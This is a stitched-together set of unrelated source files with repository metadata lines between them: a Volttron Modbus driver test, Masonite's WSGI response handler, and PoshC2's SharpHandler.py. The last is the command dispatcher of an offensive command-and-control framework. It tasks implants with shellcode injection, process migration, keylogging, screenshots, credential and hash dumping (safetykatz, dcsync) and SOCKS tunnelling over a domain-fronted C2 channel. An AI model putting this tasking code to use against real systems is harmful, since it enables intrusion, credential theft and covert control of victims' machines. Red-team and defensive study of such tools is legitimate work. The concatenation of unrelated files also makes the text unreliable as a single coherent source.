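# Each register in the map below is a 32-bit float, so it occupies two consecutive
# 16-bit Modbus holding registers and the addresses advance in steps of two (399, 401, ...).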
REGISTER_MAP = """Register Name,Address,Type,Units,Writable,Transform,Table,Mixed Endian
ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),399,float,kWh,TRUE,,analog_output_holding_registers,TRUE
REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),401,float,kWh,TRUE,,analog_output_holding_registers,TRUE
REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),403,float,kWh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),405,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),407,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),409,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),411,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),413,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
APPARENT QUADRANTS 1-4 IMPORT (kVAh),415,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
APPARENT QUADRANTS 2-3 EXPORT (kVAh),417,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
TOTAL INSTANTANEOUS REAL POWER (kW),419,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),421,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL INSTANTANEOUS APPARENT POWER (kVA),423,float,kVA,TRUE,,analog_output_holding_registers,TRUE
TOTAL POWER FACTOR (-),425,float,,TRUE,,analog_output_holding_registers,TRUE
AVERAGE VOLTAGE L-L (V),427,float,V,TRUE,,analog_output_holding_registers,TRUE
AVERAGE VOLTAGE L-N (V),429,float,V,TRUE,,analog_output_holding_registers,TRUE
AVERAGE CURRENT (A),431,float,A,TRUE,,analog_output_holding_registers,TRUE
FREQUENCY (Hz),433,float,Hz,TRUE,,analog_output_holding_registers,TRUE
TOTAL REAL POWER PRESENT DEMAND (kW),435,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),437,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL APPARENT POWER PRESENT DEMAND (kVA),439,float,kVA,TRUE,,analog_output_holding_registers,TRUE
TOTAL REAL POWER MAX. DEMAND IMPORT (kW),441,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),443,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),445,float,kVA,TRUE,,analog_output_holding_registers,TRUE
TOTAL REAL POWER MAX. DEMAND EXPORT (kW),447,float,kW,TRUE,,analog_output_holding_registers,TRUE
TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),449,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),451,float,kVA,TRUE,,analog_output_holding_registers,TRUE
PULSE COUNTER 1 (-),453,float,,TRUE,,analog_output_holding_registers,TRUE
PULSE COUNTER 2 (-),455,float,,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),457,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),459,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),461,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),463,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),465,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),467,float,kWh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),469,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),471,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),473,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),475,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),477,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),479,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),481,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),483,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),485,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),487,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),489,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),491,float,kVARh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),493,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),495,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),497,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),499,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),501,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),503,float,kVAh,TRUE,,analog_output_holding_registers,TRUE
REAL POWER PHASE A (kW),505,float,kW,TRUE,,analog_output_holding_registers,TRUE
REAL POWER PHASE B (kW),507,float,kW,TRUE,,analog_output_holding_registers,TRUE
REAL POWER PHASE C (kW),509,float,kW,TRUE,,analog_output_holding_registers,TRUE
REACTIVE POWER PHASE A (kVAR),511,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
REACTIVE POWER PHASE B (kVAR),513,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
REACTIVE POWER PHASE C (kVAR),515,float,kVAR,TRUE,,analog_output_holding_registers,TRUE
APPARENT POWER PHASE A (kVA),517,float,kVA,TRUE,,analog_output_holding_registers,TRUE
APPARENT POWER PHASE B (kVA),519,float,kVA,TRUE,,analog_output_holding_registers,TRUE
APPARENT POWER PHASE C (kVA),521,float,kVA,TRUE,,analog_output_holding_registers,TRUE
POWER FACTOR PHASE A (-),523,float,,TRUE,,analog_output_holding_registers,TRUE
POWER FACTOR PHASE B (-),525,float,,TRUE,,analog_output_holding_registers,TRUE
POWER FACTOR PHASE C (-),527,float,,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE A-B (V),529,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE B-C (V),531,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE A-C (V),533,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE A-N (V),535,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE B-N (V),537,float,V,TRUE,,analog_output_holding_registers,TRUE
VOLTAGE PHASE C-N (V),539,float,V,TRUE,,analog_output_holding_registers,TRUE
CURRENT PHASE A (A),541,float,A,TRUE,,analog_output_holding_registers,TRUE
CURRENT PHASE B (A),543,float,A,TRUE,,analog_output_holding_registers,TRUE
CURRENT PHASE C (A),545,float,A,TRUE,,analog_output_holding_registers,TRUE"""
# Register values dictionary for testing set_point and get_point
registers_dict = {"ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh)": 74.0,
"REAL ENERGY QUADRANTS 1-4 IMPORT (kWh)": 73.0,
"REAL ENERGY QUADRANTS 2-3 EXPORT (kWh)": 72.0,
"REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh)": 71.0,
"REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh)": 70.0,
"REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh)": 69.0,
"REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh)": 68.0,
"APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh)": 67.0,
"APPARENT QUADRANTS 1-4 IMPORT (kVAh)": 66.0,
"APPARENT QUADRANTS 2-3 EXPORT (kVAh)": 65.0,
"TOTAL INSTANTANEOUS REAL POWER (kW)": 64.0,
"TOTAL INSTANTANEOUS REACTIVE POWER (kVAR)": 63.0,
"TOTAL INSTANTANEOUS APPARENT POWER (kVA)": 62.0,
"TOTAL POWER FACTOR (-)": 61.0,
"AVERAGE VOLTAGE L-L (V)": 60.0,
"AVERAGE VOLTAGE L-N (V)": 59.0,
"AVERAGE CURRENT (A)": 58.0,
"FREQUENCY (Hz)": 57.0,
"TOTAL REAL POWER PRESENT DEMAND (kW)": 56.0,
"TOTAL REACTIVE POWER PRESENT DEMAND (kVAR)": 55.0,
"TOTAL APPARENT POWER PRESENT DEMAND (kVA)": 54.0,
"TOTAL REAL POWER MAX. DEMAND IMPORT (kW)": 53.0,
"TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR)": 52.0,
"TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA)": 51.0,
"TOTAL REAL POWER MAX. DEMAND EXPORT (kW)": 50.0,
"TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR)": 49.0,
"TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA)": 48.0,
"PULSE COUNTER 1 (-)": 47.0,
"PULSE COUNTER 2 (-)": 46.0,
"ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh)": 45.0,
"ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh)": 44.0,
"ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh)": 43.0,
"ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh)": 42.0,
"ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh)": 41.0,
"ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh)": 40.0,
"ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh)": 39.0,
"ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh)": 38.0,
"ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh)": 37.0,
"ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh)": 36.0,
"ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh)": 35.0,
"ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh)": 34.0,
"ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh)": 33.0,
"ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh)": 32.0,
"ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh)": 31.0,
"ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh)": 30.0,
"ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh)": 29.0,
"ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh)": 28.0,
"ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh)": 27.0,
"ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh)": 26.0,
"ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh)": 25.0,
"ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh)": 24.0,
"ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh)": 23.0,
"ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh)": 22.0,
"REAL POWER PHASE A (kW)": 21.0,
"REAL POWER PHASE B (kW)": 20.0,
"REAL POWER PHASE C (kW)": 19.0,
"REACTIVE POWER PHASE A (kVAR)": 18.0,
"REACTIVE POWER PHASE B (kVAR)": 17.0,
"REACTIVE POWER PHASE C (kVAR)": 16.0,
"APPARENT POWER PHASE A (kVA)": 15.0,
"APPARENT POWER PHASE B (kVA)": 14.0,
"APPARENT POWER PHASE C (kVA)": 13.0,
"POWER FACTOR PHASE A (-)": 12.0,
"POWER FACTOR PHASE B (-)": 11.0,
"POWER FACTOR PHASE C (-)": 10.0,
"VOLTAGE PHASE A-B (V)": 9.0,
"VOLTAGE PHASE B-C (V)": 8.0,
"VOLTAGE PHASE A-C (V)": 7.0,
"VOLTAGE PHASE A-N (V)": 6.0,
"VOLTAGE PHASE B-N (V)": 5.0,
"VOLTAGE PHASE C-N (V)": 4.0,
"CURRENT PHASE A (A)": 3.0,
"CURRENT PHASE B (A)": 2.0,
"CURRENT PHASE C (A)": 1.0}
@pytest.fixture(scope="module")
def agent(request, volttron_instance):
"""
Build PlatformDriverAgent, add modbus driver & csv configurations
"""
# Build platform driver agent
md_agent = volttron_instance.build_agent(identity="test_md_agent")
capabilities = {'edit_config_store': {'identity': PLATFORM_DRIVER}}
volttron_instance.add_capabilities(md_agent.core.publickey, capabilities)
# Clean out platform driver configurations
# wait for it to return before adding new config
md_agent.vip.rpc.call('config.store',
'manage_delete_store',
PLATFORM_DRIVER).get()
# Add driver configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
PLATFORM_DRIVER,
'devices/modbus_tk',
jsonapi.dumps(DRIVER_CONFIG),
config_type='json')
# Add csv configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
PLATFORM_DRIVER,
'modbus_tk.csv',
REGISTRY_CONFIG_STRING,
config_type='csv')
md_agent.vip.rpc.call('config.store',
'manage_store',
PLATFORM_DRIVER,
'modbus_tk_map.csv',
REGISTER_MAP,
config_type='csv')
platform_uuid = volttron_instance.install_agent(
agent_dir=get_services_core("PlatformDriverAgent"),
config_file={},
start=True)
gevent.sleep(10) # wait for the agent to start and start the devices
def stop():
"""
Stop platform driver agent
"""
volttron_instance.stop_agent(platform_uuid)
md_agent.core.stop()
request.addfinalizer(stop)
return md_agent
@pytest.fixture(scope='class')
def modbus_server(request):
modbus_client = Catalog()['battery_meter'].get_class()
server_process = Server(address=IP, port=PORT)
server_process.define_slave(1, modbus_client, unsigned=False)
server_process.start()
time.sleep(1)
yield server_process
time.sleep(1)
server_process.stop()
@pytest.mark.usefixtures("modbus_server")
class TestModbusTKDriver:
"""
Regression tests for the modbus_tk driver interface.
"""
def get_point(self, agent, device_name, point_name):
"""
Issue a get_point RPC call for the named point and return the result.
@param agent: The test Agent.
@param device_name: The driver name, by default: 'devices/device_name'.
@param point_name: The name of the point to query.
@return: The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call(PLATFORM_DRIVER, 'get_point', device_name,
point_name).get(timeout=10)
def set_point(self, agent, device_name, point_name, point_value):
"""
Issue a set_point RPC call for the named point and value, and return the
result.
@param agent: The test Agent.
@param device_name: The driver name, by default: 'devices/device_name'.
@param point_name: The name of the point to query.
@param point_value: The value to set on the point.
@return:The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call(PLATFORM_DRIVER, 'set_point', device_name,
point_name, point_value).get(timeout=10)
def scrape_all(self, agent, device_name):
"""
Issue a get_point RPC call for the device and return the result.
@param agent: The test Agent.
@param device_name: The driver name, by default: 'devices/device_name'.
@return: The dictionary mapping point names to their actual values from
the RPC call.
"""
return agent.vip.rpc.call(PLATFORM_DRIVER, 'scrape_all', device_name)\
.get(timeout=10)
def test_scrape_all(self, agent):
for key in registers_dict.keys():
self.set_point(agent, 'modbus_tk', key, registers_dict[key])
assert self.get_point(agent, 'modbus_tk', key) == \
registers_dict[key]
assert type(self.scrape_all(agent, 'modbus_tk')) is dict
|
src/masonite/foundation/response_handler.py | cercos/masonite | 1,816 | 12746222 | <reponame>cercos/masonite
def response_handler(environ, start_response):
"""The WSGI Application Server.
Arguments:
environ {dict} -- The WSGI environ dictionary
start_response {WSGI callable}
Returns:
WSGI Response
"""
from wsgi import application
application.bind("environ", environ)
"""Add Environ To Service Container
    Add the environ to the service container. The environ is generated by
    the WSGI server above and used by a service provider to manipulate the
    incoming requests.
"""
# """Execute All Service Providers That Require The WSGI Server
# Run all service provider boot methods if the wsgi attribute is true.
# """
try:
for provider in application.get_providers():
application.resolve(provider.boot)
except Exception as e:
application.make("exception_handler").handle(e)
"""We Are Ready For Launch
If we have a solid response and not redirecting then we need to return
a 200 status code along with the data. If we don't, then we'll have
    to return a 302 redirection to wherever the user would like to go
    next.
"""
_, response = application.make("request"), application.make("response")
start_response(
response.get_status_code(),
response.get_headers() + response.cookie_jar.render_response(),
)
"""Final Step
This will take the data variable from the Service Container and return
it to the WSGI server.
"""
return iter([response.get_response_content()])
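# Minimal usage sketch (an assumption for illustration, not part of this module):
# ``response_handler`` is a standard WSGI callable, so any WSGI server can serve it,
# e.g. with waitress:
#   from waitress import serve
#   serve(response_handler, host="127.0.0.1", port=8000)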
def testcase_handler(application, environ, start_response, exception_handling=True):
"""The WSGI Application Server.
Arguments:
environ {dict} -- The WSGI environ dictionary
start_response {WSGI callable}
Returns:
WSGI Response
"""
from wsgi import application
application.bind("environ", environ)
"""Add Environ To Service Container
    Add the environ to the service container. The environ is generated by
    the WSGI server above and used by a service provider to manipulate the
    incoming requests.
"""
# """Execute All Service Providers That Require The WSGI Server
# Run all service provider boot methods if the wsgi attribute is true.
# """
try:
for provider in application.get_providers():
application.resolve(provider.boot)
except Exception as e:
if not exception_handling:
raise e
application.make("exception_handler").handle(e)
"""We Are Ready For Launch
If we have a solid response and not redirecting then we need to return
a 200 status code along with the data. If we don't, then we'll have
    to return a 302 redirection to wherever the user would like to go
    next.
"""
request, response = application.make("request"), application.make("response")
start_response(
response.get_status_code(),
response.get_headers() + response.cookie_jar.render_response(),
)
"""Final Step
This will take the data variable from the Service Container and return
it to the WSGI server.
"""
return (request, response)
|
poshc2/client/command_handlers/SharpHandler.py | nettitude/PoshC2_Python | 237 | 12746223 | <gh_stars>100-1000
import base64, re, traceback, os, string, subprocess
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import cs_alias, cs_replace
from poshc2.Colours import Colours
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp
from poshc2.client.Help import sharp_help, allhelp
from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory, ModulesDirectory
from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret, FCommFileName
from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader
from poshc2.server.Core import print_bad, print_good
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.server.database.DB import hide_implant, new_task, kill_implant, get_implantdetails, get_sharpurls, get_baseenckey, get_powerstatusbyrandomuri
from poshc2.server.database.DB import select_item, update_label, get_allurls, get_c2server_all, get_newimplanturl, new_urldetails
def handle_sharp_command(command, user, randomuri, implant_id):
# alias mapping
for alias in cs_alias:
if alias[0] == command[:len(command.rstrip())]:
command = alias[1]
# alias replace
for alias in cs_replace:
if command.startswith(alias[0]):
command = command.replace(alias[0], alias[1])
original_command = command
command = command.strip()
run_autoloads_sharp(command, randomuri, user)
if command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("searchallhelp"):
do_searchallhelp(user, command, randomuri)
return
elif command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command == "kill-process":
do_kill_process(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command.startswith("sharpsocks"):
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("stop-keystrokes")):
do_stop_keystrokes(user, command, randomuri)
return
elif (command.startswith("start-keystrokes")):
do_start_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-keystrokes")):
do_get_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-screenshotmulti")):
do_get_screenshotmulti(user, command, randomuri)
return
elif command.startswith("get-screenshot"):
do_get_screenshot(user, command, randomuri)
return
elif command == "getpowerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "stoppowerstatus":
do_stoppowerstatus(user, command, randomuri)
return
elif command.startswith("run-exe SharpWMI.Program") and "execute" in command and "payload" not in command:
do_sharpwmi_execute(user, command, randomuri)
return
elif (command.startswith("get-hash")):
do_get_hash(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("safetykatz")):
do_safetykatz(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoduleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("listmodules"):
do_listmodules(user, command, randomuri)
return
elif command.startswith("modulesloaded"):
do_modulesloaded(user, command, randomuri)
return
elif command.startswith("pbind-connect"):
do_pbind_start(user, command, randomuri)
return
elif command.startswith("fcomm-connect"):
do_fcomm_start(user, command, randomuri)
return
elif command.startswith("dynamic-code"):
do_dynamic_code(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command.startswith("dcsync"):
do_dcsync(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
else:
if command:
do_shell(user, original_command, randomuri)
return
def do_searchhelp(user, command, randomuri):
searchterm = (command).replace("searchhelp ", "")
helpful = sharp_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchhistory(user, command, randomuri):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+", ""))
def do_upload_file(user, command, randomuri):
# TODO lots of common code
source = ""
destination = ""
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc()
def do_inject_shellcode(user, command, randomuri):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "C#":
path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
def do_kill_process(user, command, randomuri):
impid = get_implantdetails(randomuri)
print_bad("**OPSEC Warning** - kill-process will terminate the entire process, if you want to kill the thread only use kill-implant")
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "" or ri.lower() == "y":
pid = impid.PID
new_task("kill-process %s" % (pid), user, randomuri)
kill_implant(randomuri)
def do_kill_implant(user, command, randomuri):
impid = get_implantdetails(randomuri)
print_bad("**OPSEC Warning** - kill-implant terminates the current threat not the entire process, if you want to kill the process use kill-process")
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "" or ri.lower() == "y":
pid = impid.PID
new_task("exit", user, randomuri)
kill_implant(randomuri)
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri)
def do_sharpsocks(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
from random import choice
channel = "".join(choice(string.ascii_letters) for _ in range(25))
sharp_key = gen_key().decode("utf-8")
default_sharp_urls = get_sharpurls()
urls_prompt = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.comma-separated-urls-history'), auto_suggest=AutoSuggestFromHistory(), style=style)
socks_proxy_urls = urls_prompt.prompt(f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ', '')}: ")
if not socks_proxy_urls:
socks_proxy_urls = default_sharp_urls
socks_proxy_urls = socks_proxy_urls.split(",")
if len(socks_proxy_urls) < 2:
print("Please specify at least two URIs")
return
socks_proxy_urls = [i.replace("\"", "").strip() for i in socks_proxy_urls]
socks_proxy_urls = [(i[1:] if i.startswith("/") else i) for i in socks_proxy_urls]
default_sharp_url = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0]
domains_prompt = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.protocol-and-domain-history'), auto_suggest=AutoSuggestFromHistory(), style=style)
sharp_url = domains_prompt.prompt(f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: ")
if not sharp_url:
sharp_url = default_sharp_url
if not sharp_url.startswith("http"):
print("Please specify a protocol (http/https)")
return
default_host_header = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
host_headers_prompt = PromptSession(history=FileHistory('%s/.host-headers-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
host_header = host_headers_prompt.prompt(f"What host header should used? Default is {default_host_header}: ")
if not host_header:
host_header = default_host_header
default_user_agent = select_item("UserAgent", "C2Server")
user_agent_prompt = PromptSession(history=FileHistory('%s/.user-agents-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
user_agent = user_agent_prompt.prompt(f"What user agent? Default is \"{default_user_agent}\": ")
if not user_agent:
user_agent = default_user_agent
default_beacon = "200"
beacon_prompt = PromptSession(history=FileHistory('%s/.beacon-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
beacon = beacon_prompt.prompt(f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: ")
if not beacon:
beacon = default_beacon
if beacon.strip().endswith("ms"):
beacon = beacon.replace("ms", "").strip()
server_command = f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"
if " -v" in command or " --verbose" in command:
server_command += " --verbose"
server_command += "\n"
print(Colours.GREEN + "\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n")
print(server_command)
task = f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\""
if host_header:
task += f" -df {host_header}"
extra_args = command.replace("sharpsocks ", "").strip()
if extra_args:
task += " " + extra_args
confirm = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if confirm == "" or confirm.lower() == "y":
new_task(task, user, randomuri)
